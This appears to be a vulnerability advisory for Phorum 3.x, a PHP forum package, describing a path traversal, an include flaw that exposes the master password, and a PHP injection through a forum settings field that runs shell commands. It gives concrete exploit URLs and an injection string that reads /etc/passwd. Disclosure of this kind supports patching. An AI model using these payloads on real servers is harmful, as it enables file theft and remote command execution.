|
|
|
|
| |
| Phorum is a web based discussion software written in PHP. Unlike some popular web boards, Phorum utilizes a database to manage its messages. A few security vulnerabilities have been found that allows remote attackers to gain access to passwords stored by Phorum and used for access verification. These vulnerabilities also allow attackers to read the source of php files. |
| |
Credit:
The information has been provided by Jo?o Gouveia and Brian Moon.
|
| |
Vulnerable systems:
Phorum versions 3.1 and higher (until version 3.2.9)
Immune systems:
Phorum 3.2.9
Exploit:
ForumLang:
Using a URL such as:
http://www.example.com/support/common.php?f=0&ForumLang=../../../../../../../etc/resolv.conf
Will expose the content of /etc/resolv.conf.
Select forum bug:
In various scripts, a user-supplied variable corresponds to a php script containing the settings for the select forum. An example would be: forums/list.php?f=<forum's id>
Faulty piece of code ( in common.php ):
<quote>
...
if($num || $f){
if($f) $num=$f;
if(file_exists("$admindir/forums/$num.php")){
include "$admindir/forums/$num.php";
}
....
</quote>
Knowing this, we can call other php scripts that might have interesting data instead of the forum's script. Although Phorum's security.txt advises users to protect their include's and configuration data using methods as .htpasswd or relocating that files out of the document root, it's still possible to fetch them exploiting this bug. If we call the file that is usually located in admin_dir/pages/master.php we get interesting info about Phorum, as for example the "Master Password". With this password we can create/modify Phorum's databases and manage the whole system.
Existence script:
In this situation, having access do the master password allows anyone to modify the existence forum.
<quote>
...
if($rec->folder=="0"){
$data.=" \$ForumDisplay='$rec->display';\n";
$data.=" \$ForumTableName='$rec->table_name';\n";
$data.=" \$ForumModeration='$rec->moderation';\n";
$data.=" \$ForumModEmail='$rec->mod_email';\n";
$data.=" \$ForumModPass='$rec->mod_pass';\n";
....
$fp = fopen("$admindir/forums/$rec->id.php", "w");
fputs($fp, $data);
...
</quote>
As can be seen above, we can add our php code to the fields. Using the master password we obtained with the above mentioned problem, we edit one of the existence forums and we add something like, for example in the
'ForumModEmail'field: mod@vuln.host.tld';system($com);echo'
This would execute our code, supplied in var 'com'.
Giving us something of the sort of:
forum/list.php?f=1&com=cat%20/etc/passwd
|
|
|
|
|
